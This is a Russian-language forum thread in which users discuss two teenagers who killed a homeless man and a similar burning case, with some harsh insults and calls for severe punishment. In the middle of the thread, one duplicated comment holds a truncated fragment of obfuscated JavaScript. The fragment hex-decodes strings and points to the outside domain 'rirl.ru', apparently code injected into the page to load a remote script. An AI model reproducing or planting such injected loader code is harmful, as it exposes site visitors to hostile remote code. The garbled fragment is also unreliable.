Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2017-10-18 09:58:52 от анна
как жить если мне некто неверит ... Подробнее
Последний комментарий
История : Всегда будет больно
25 минут назад2017-10-19 05:33:39 от Violetta
14552Я тоже ни хрена не поняла, настолько все сумбурно написано, что суть уплывает. Скажу одно - девочка! Е-мое! Твои "проблемы" - это не проблемы! Ты еще не знаешь КАК тяжело быть взрослым. Все вот эти ваши переживания на счет каких-то поцелуев, кто-что сказал, кто не так ответил (или не ответил) ... Все комментарии71421
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории из жизни
Каким цветом кеды?
16 октября в 18:32:52
НЕ могу сделать кувырок!  ( 1 2 3 )
15 октября в 20:04:52
Загадка
11 октября в 12:56:08
Muhammed
10 октября в 17:44:34
Больно
01 сентября в 12:11:22
как без них
28 августа в 21:07:30
А что же это-счастье?  ( 1 2 3 )
16 августа в 19:01:25
Истории из жизни : Я в шоке.     

Сегодня от знакомой узнала историю. И я вам скажу я в большом шоке. В городе Красноярске два подростка девочка и мальчик 15ти лет скинули с моста бомжа (он умер) ,  за это их осудили на очень маленький срок. И есть соответствующие вопросы: Что их на это подтолкнуло? Родители учили их жестокости? И почему их не осудили как 18ти летних? Ведь эти дети жестоки,  убить человека ради забавы. Они думали если бомж, то его жизнь ничего не стоит? Человек живёт на улице и если он жив и сам не свел счеты с жизнью значит он хочет жить и он борется за кусок хлеба... Молодое поколение... Ужас... 

62525
Другие Истории из жизни
(33)
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58590
Комментариев 900 1
24 декабря 2015 11:59:48
2015-12-24 11:59:48

Моё мнение - виноваты в первую очередь родители, недовоспитали.

Ответить
Поддерживаю Да4 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 11:59:56
2015-12-24 11:59:56

А помните недавно нашумевшую историю с сожженным бомжом? Уродка, сделавшее это, вообще не села, ибо ей было 14. В той ситуации были виноваты и "родители", я лично видела эту "добрую маму", которая бомжа и за человека не считала и планомерно это внушала дочке.

А вообще нам в институте говорили, что дети сами по себе очень жестоки, ибо не понимают иногда, что творят и не понимают ответственности за свои действия.

Но в данном конкретном случае, считаю, что все они понимали. Убить человека - как это можно не осознавать в 14 (и в 7, та тоже такие были) лет?

Ответить
Поддерживаю Да7 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Султан
Султан

24 декабря 2015 13:16:19
2015-12-24 13:16:19
Офигеть воспитали ублюдков
Ответить
Поддерживаю Да2 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 3122381
Комментариев 18270 25
24 декабря 2015 13:25:38
2015-12-24 13:25:38

У нас в городе, в этом году, девочка бомжа подожгла.. Тоже все были в шоке. Не знаю, я тоже было ребёнком, но никогда не было желания идти и поджечь кого-то. По мне, это ненормально и жестоко.

В случае с девочкой из моего города, родители виноваты были в том, что ребёнок был предоставлен сам себе. Нет, они нормальная семья, просто постоянно пропадали на работе. А девочка развлекалась как могла. Видимо поджигание бомжа, она посчитала нормальным развлечением.

Да что говорить о детях, когда некоторые взрослые к тем же бомжам настроены неадекватно. Стояла я на остановке, а там на скамейке отдыхал бомж. Тут пришёл мужик и начал к бомжу приставать, а потом вообще, начал бить. Хорошо, что на остановке были адекватные мужики, которые осадили этого придурка.

Ответить
Поддерживаю Да8 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

24 декабря 2015 13:26:20
2015-12-24 13:26:20

Не нужно винить все молодое поколение, моральные уроды были всегда. А то немного подбешивают, что каждое последующие предыдущее начинает клеймить следующее. Есть дети, которые бабушек вытаскивают из горящих домов (тоже недавно было), а есть те, кто бомжей скидывают с моста.

Что в этом виновато... Наверное, отчасти родительское воспитание, отчасти — природные наклонности, ведь часто бывает так, что ребенок при довольно жестокосердных родителях сам не является жестоким; отчасти — и воспитание общественное, когда людям совершенно безразлично, что этот самый бомж может замерзнуть на морозе (да и не обязательно бомж , те же уснувшие на морозе пьяные), но при этом каждый из нас кидается с осуждениями каких-то детей, которые скинули этого самого бомжа с моста.

Ответить
Поддерживаю Да5 / Нет0
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 289627
Комментариев 2734 8
24 декабря 2015 13:32:01
2015-12-24 13:32:01

А зачем дети мучают животных??? Я считаю, что из таких детей вырастут такие же взрослые. Маньяки, убийцы.... Какая то может генетика нездоровая? Или атмосфера в семье....

Ответить
Поддерживаю Да3 / Нет0
Ну СТРАННАЯ я, не без изъяна.Я просто пасу здесь своих тараканов...
белая мышка
9141 белая мышка
Белая мышка offline
Репутация : 216993
Комментариев 2060 19
24 декабря 2015 13:34:03
2015-12-24 13:34:03

Конечно же виноваты родители. Холят и лелеют свое чадо, все им спускают с рук. А из них потом вон что выростает. Ужас...

Таких надо вместе с родителями наказывть. Отправлять в калонию поселения на исправительные работы. Чтоб в следующий раз соображали

Ответить
Поддерживаю Да3 / Нет0
казаться легкодоступной, но при этом быть недосягаемой-это верх искусства
Гость
Гость

24 декабря 2015 14:20:10
2015-12-24 14:20:10
Жестокость, цинизм, нигилизм присущ подросткам и порою он выходит далеко за грани дозволенного. И не всегда жестокость подростка связана с грубым отношением к нему родителей, их индифферентностью к детям ( после рабочая усталость, семейный кризис, проблемы "40-лет" и вроде и воспитывают их как большинство родителей. Однако ихние полу-взрослые дети совершают подобные преступления. Порыв агрессии (вызванный может быть пустяковым стрессом) одного подростка, подражание( вполне характерное-главное не идти против "своих") ему остальных 2 лиц в данном случае, клеймо бича общества-бомжа, отсутствие четких нравственных убеждений и приводит к таким, к сожалению, обыкновенным происшествиям. А тюрьма... не исправляет.. наказание было создано не только для исправления какого-то лица, а чтобы другие не последовали его примеру
Ответить
Поддерживаю Да4 / Нет0
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
  • Мастер прохождения квестов
Репутация : 1986463
Комментариев 8222 47
24 декабря 2015 14:42:59
2015-12-24 14:42:59

Ужасно конечно. Меня такие истории повергают в шок. Я не понимаю, как люди могут быть настолько жестоки. Как дети могут быть настолько жестоки.

Хочется слегка вступиться за родителей. Считаю, что не стоит так категорично их обвинять. Очень много значит для ребенка окружение: класс, улица, компания. Я действительно знаю несколько семей, где в нормальных семьях вырастали моральные уроды. Один ребенок нормальный, а другой - наркоман, садист, пьяниц а и вообще душевный инвалид. Что, одного воспитывали, а другого нет? Или по разному воспитывали? Иногда родители за голову хватаются, но сделать ничего не могут.

Я не знаю как там с родителями в этом конкретном случае, но я бы таких детей однозначно судила как взрослых. И изолировать их от общества. Ничего хорошего из них в любом случае не вырастет.

Ответить
Поддерживаю Да5 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Аликиандра
20585 Аликиандра
Аликиандра offline
Репутация : 1118
Комментариев 51 3
24 декабря 2015 15:17:28
2015-12-24 15:17:28

Сиреневая Кошка, Как говорится в семье не без урода {#}

Ответить
Поддерживаю Да0 / Нет0
LIKA
Татьяна Syxaya
19698 Татьяна Syxaya
Татьяна Syxaya offline
Репутация : 40269
Комментариев 349 3
24 декабря 2015 15:33:38
2015-12-24 15:33:38

Violetta, той девочке было 12 лет. И именно поэтому она не села. А если бы ей было 14, то всё бы было иначе.

Я тоже за изоляцию, за то, чтобы сажали таких "деточек". И ещё обязательно нужно проверять родителей. Не знаю. какие там родители у детей, которые скинули с моста человека, но вот у той 12-летней ещё та мамаша, которая назвала это "шуткой", а её "чадо" вообще смеялось и называла человека. которого сожгла бичом! Таких родителей тоже нужно сажать по всей строгости и без поблажек. Да в любом случае. До 18 лет родители несут ответственность за своего ребенка!!! А значит в первую очередь они отвечают за эти преступления.

Ответить
Поддерживаю Да2 / Нет0
Edite, bibite, post mortem nulla voluptas
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 15:38:52
2015-12-24 15:38:52

Татьяна Syxaya, да, верно. я ошиблась. И мамашку я видела. Тупая мразь.

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
  • Мастер прохождения квестов
Репутация : 1986463
Комментариев 8222 47
24 декабря 2015 15:51:29
2015-12-24 15:51:29

Violetta, А можешь ссылку в личку бросить? Я поискала - не могу найти. Интересно посмотреть на эту маму.

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 16:08:09
2015-12-24 16:08:09

Сиреневая Кошка, че-то не могу тебе написать в личку. Не добавляется сообщение. Набери в яндексе "Шумиха. Мужское / женское выпуск от 28. 10. 2015"

если крепкие нервы - посмотри с начала до конца, там минут 45. Я просто не могу спокойно смотреть на таких уродов. Моих возмущений никто не увидит, а нервы я себе трачу.

Ответить
Поддерживаю Да1 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
  • Мастер прохождения квестов
Репутация : 1986463
Комментариев 8222 47
24 декабря 2015 16:11:13
2015-12-24 16:11:13
Violetta, Спасибо большое. Дома посмотрю.
Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 16:15:14
2015-12-24 16:15:14

Честно сказать, я тоже не понимаю, почему у нас ответственность наступает с 14 лет? У этой милой красной шапочки есть время убить еще людей. Конечно, можно пожалеть ее, что , типа, она ребенок, ей мать внушила. Мать там, действительно, настолько глупа, что у меня нет слов. Называть человека "Ведь он же бич!!!", подчеркивая тем самым , что данный человек не имеет право на существование... Я в шоке... У меня не находится даже маленькой крошки оправдания для этой милой мамочки.

Ответить
Поддерживаю Да4 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
  • Мастер прохождения квестов
Репутация : 1986463
Комментариев 8222 47
24 декабря 2015 16:31:57
2015-12-24 16:31:57
Violetta, Я уже с обеда выходила, включила, там минут 5 в быстрой перемотке посмотрела. Ужас, конечно. Мать - тупое жирное нечто. "От ожогов 1-2 степени еще никто не умирал". Мрази кусок. А что ж человек умер? Девочка тоже выглядит какой-то недоразвитой слегка. Или просто ужасно запущенной. Тихий ужас какой-то. Что больше всего поразило, то, что у девочки спросили: "Ты понимала, что если ты его подожжешь, он умрет?", и она ответила, что понимала. Кошмар просто. В 12 лет у ребенка вообще нет никаких социальных норм, морали. Что не удивительно с такой мамашей, конечно.
Ответить
Поддерживаю Да2 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 3122381
Комментариев 18270 25
24 декабря 2015 16:37:32
2015-12-24 16:37:32

Violetta, ооо, а я не знала, что показывали об этом, я читала только в местной прессе, что в городе Шумихе, что находится в нашей области, такое случилось. Сегодня тоже посмотрю.

Ответить
Поддерживаю Да1 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Сиреневая Кошка
12351 Сиреневая Кошка
Сиреневая Кошка online
  • Мастер прохождения квестов
Репутация : 1986463
Комментариев 8222 47
24 декабря 2015 16:38:42
2015-12-24 16:38:42

Violetta, А моєжешь ссылку в личку бросить? Я поискала - не могу найти. Интересно посмотреть на эту маму.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да0 / Нет0
Некоторым кажется, что я ненормальная. А многие уже поняли, что им не кажется.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 17:08:10
2015-12-24 17:08:10

Сиреневая Кошка, так у этой доброй мамы - ВНИМАНИЕ!!! 4 детей! И правильно сказал ведущий: "Мы уже боимся вашей семьи"

Блондиночка , тюю, ты че? Даже по 1 каналу, кажется, показывали в новостях

Ответить
Поддерживаю Да0 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Аликиандра
20585 Аликиандра
Аликиандра offline
Репутация : 1118
Комментариев 51 3
24 декабря 2015 18:07:50
2015-12-24 18:07:50

Это ужасно. Как минимум в 3-ёх городах подростки не достигшие и 16 лет убивают. Я считаю это потому что родители этих всех детей не считают бомжа за человека и дети воспринимают их как неких животных, потому что по факту даже взрослые если увидят что дети тешатся над этим бездомным, они не думают что дети звери, они думают что он может сделать с ними все что угодно, так сказать "маньяк"

Ответить
Поддерживаю Да1 / Нет0
LIKA
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 3122381
Комментариев 18270 25
24 декабря 2015 21:30:44
2015-12-24 21:30:44

Violetta, я буквально сейчас посмотрела про эту девочку, до этого я только читала... Что сказать... В шоке я.... Что из неё вырастит не ясно, она уже отморозок. Да и мамаша ещё та штучка... Жесть просто....

Ответить
Поддерживаю Да3 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 21:34:36
2015-12-24 21:34:36

Блондиночка , согласна. И жаль, что ее нельзя посадить. И все она осознавала и понимала.

Ответить
Поддерживаю Да3 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 3122381
Комментариев 18270 25
24 декабря 2015 21:41:40
2015-12-24 21:41:40

Violetta, так меня убило, что она ржала даже. От того, что кто-то из её дружков обоссал бомжа.

Помню как-то давно, один из моих знакомых, мы тогда были юны, поджёг кошку. Я думала его уничтожу. Кошку я сразу потушила, она ещё не успела обгореть, но знакомого этого готова была прибить. Ну и не смешно мне было ни разу.

А у этой девочки уже мозг набекрень. Да и глаза у неё стеклянные какие-то.... Пустые. Как у маньяка. Ну никаких особых эмоций она не выражала, кроме растерянности.

Ответить
Поддерживаю Да3 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Violetta
14552 Violetta
Violetta online
Репутация : 1367875
Комментариев 9849 0
24 декабря 2015 21:43:41
2015-12-24 21:43:41

Блондиночка , а мне кажется, что до нее дошло, что она сделал каку и все ее осуждают. Я не смогла посмотреть до конца, очень неприятно, мерзко.

Ответить
Поддерживаю Да2 / Нет0
Хорошее настроение - это когда не очень умные люди не бесят, а веселят.
Блондиночка
10883 Блондиночка
Блондиночка offline
  • Мисс Остроумие
Репутация : 3122381
Комментариев 18270 25
24 декабря 2015 21:48:19
2015-12-24 21:48:19

Violetta, да нифига она не осознала. Да и мать ещё это преподносит, как маленькую шалость. Ну подумаешь, прикончила бомжа? Кто не совершает ошибок? А то, что этот бомж - человек, как-то ушло на второй план.

Ответить
Поддерживаю Да3 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 180181
Комментариев 6123 9
28 декабря 2015 18:15:26
2015-12-28 18:15:26

Капец конечно, бомжи-тоже люди и их скорее надо пожалеть, а так поступать не по-человечески!!!Даже не представляю что из них вырастет если в 15 лет они уже способны на убийство!!Конечно считаю что в основном родители виноваты и воспитание, но еще много влияния оказывает окружение. И не верится что мы в такое жестокое время живем!

Ответить
Поддерживаю Да0 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Проходил мимо
17688 Проходил мимо
Проходил мимо offline
Репутация : 58590
Комментариев 900 1
28 декабря 2015 20:39:28
2015-12-28 20:39:28

ксюня-звезда , знаете, я с 7 лет общался в кругу не совсем спокойных, а в дальнейшем и законопослушных друзей. Сначала курили, потом начали употреблять алкоголь и травку, дальше пошли кражи, грабежи, избиение, мошенничества в разных размерах и областях. Но воспитание родителей дало мне сил в нужные моменты говорить - нет! Нет я не буду пить! Нет я не буду курить траву, колоться и нюхать! Нет я не пойду грабить! В итоге процентов 80% из моего круга общения подросткового возраста в данный момент либо сидели и сидят, либо умерли от передозировки, либо и по сей день являются наркоманами. А сейчас, когда иногда встречаемся с некоторыми мы можем допустим выпить вместе или даже напиться, но если они начинают курить траву то уже много лет даже не предлагают, зная мой ответ - нет, я не буду! А если у них есть какие-либо не совсем чистые дела, то мне говорят - это тебе не нужно. Так и получается, что тогда общаясь в неблагоприятных условиях именно воспитание родителей дало мне сил сделать свой выбор. Пускай этот выбор не такой уж и весёлый, не знаю как сказать даже. Но этот подростковый выбор пожалуй стал моим первым дальновидным шагом, за который я не несу ответственности и за который получил лишь уважение друзей и товарищей. Но опять же это лишь благодаря воспитанию родителей, благодаря которому я знаю, что такое хорошо и плохо, что такое можно и нельзя, что сделать нужно для будущего, а что запрещено даже сию секунду. И именно воспитание родителей позволило отказаться от соблазнов предлагаемых окружающей средой.

Ответить
Поддерживаю Да0 / Нет0
Все норовят сунуться в моих тихий омут и обидеть моих милых чертей.
ксюня-звезда
7355 ксюня-звезда
Ксюня-звезда offline
Репутация : 180181
Комментариев 6123 9
29 декабря 2015 00:26:17
2015-12-29 00:26:17

Да я думаю многие в подростковом возрасте проходят это-и алкоголь и травка и прочее, а потом либо перерастали это все либо катились по наклонной, у меня тоже это было все, но я переросла и теперь у меня другие интересы)). Но убивать людей-это вообще за гранью!!!И возраст тех подростков оправдывать не должен был!!

Ответить
Поддерживаю Да0 / Нет0
ХОТЕЛА ЗАМУЖ... Пересмотрела взгляды на жизнь!.....Теперь хочу длинные волосы, новые туфельки, машин
Странная_Такая
20287 Странная_Такая
Странная_Такая offline
Репутация : 289627
Комментариев 2734 8
29 декабря 2015 01:30:11
2015-12-29 01:30:11

Боже ну зачем я посмотрела эту передачу??!! Жить стало ещё страшнее... Может нельзя, конечно, говорить так о детях... Ну их и детьми то трудно назвать.. У сех малолетних, которые задействованы в этой истории, какая то страшная одинаковая печать идиотизма на лице((((вот есть такие дети к сожалению. Дети маргиналов. Они похожи между собой... Ужас. Я бы не хотела встретить такую 12-ти летнюю девочку а тёмном переулке. Не знаю можно ли превоспитть такого ребенка? Мне кажется - это врожденная тяга к садизму. Так изощрённо издеваться над живым человеком.. И смеяться. Не каждый опытный маньяк на такое способен. Это тот случай, когда в купели надо топить.

Ответить
Поддерживаю Да0 / Нет0
Ну СТРАННАЯ я, не без изъяна.Я просто пасу здесь своих тараканов...
Аля
Аля

20 февраля 2016 14:42:19
2016-02-20 14:42:19
Таких детей нужно ограждать от нормальных. В детскую колонию. Выпускать только по заключению психолога и пристальное внимание за поведением и построения жизни. Если отклонение от нормальной жизни - пожизненно в тюрьму. Не нужны такие люди обществу.
Ответить
Поддерживаю Да0 / Нет0
Olga 85
Olga 85

15 апреля 16:13:58
2017-04-15 16:13:58
Я думаю, что это дети растут жестокими из-за отсутствия цензуры. По телевизору постоянно убивают, насилуют и т. п.
Ответить
Поддерживаю Да0 / Нет0
Olga 85
Olga 85

15 апреля 16:14:08
2017-04-15 16:14:08
У меня недавно был случай… Моему сыну в контакте присылал сообщения одноклассник. Там был мат, угрозы, а в добавок фото лестничного проема и слова «отсюда полетишь». Ребенок мне показал сам. Я решила очень тактично поговорить с его мамой, ведь она может и не в курсе, что ее сын пишет. Я позвонила, она даже не выслушала, потом сказала, что у них в семье матом не ругаются и сбросила.
Ответить
Поддерживаю Да0 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке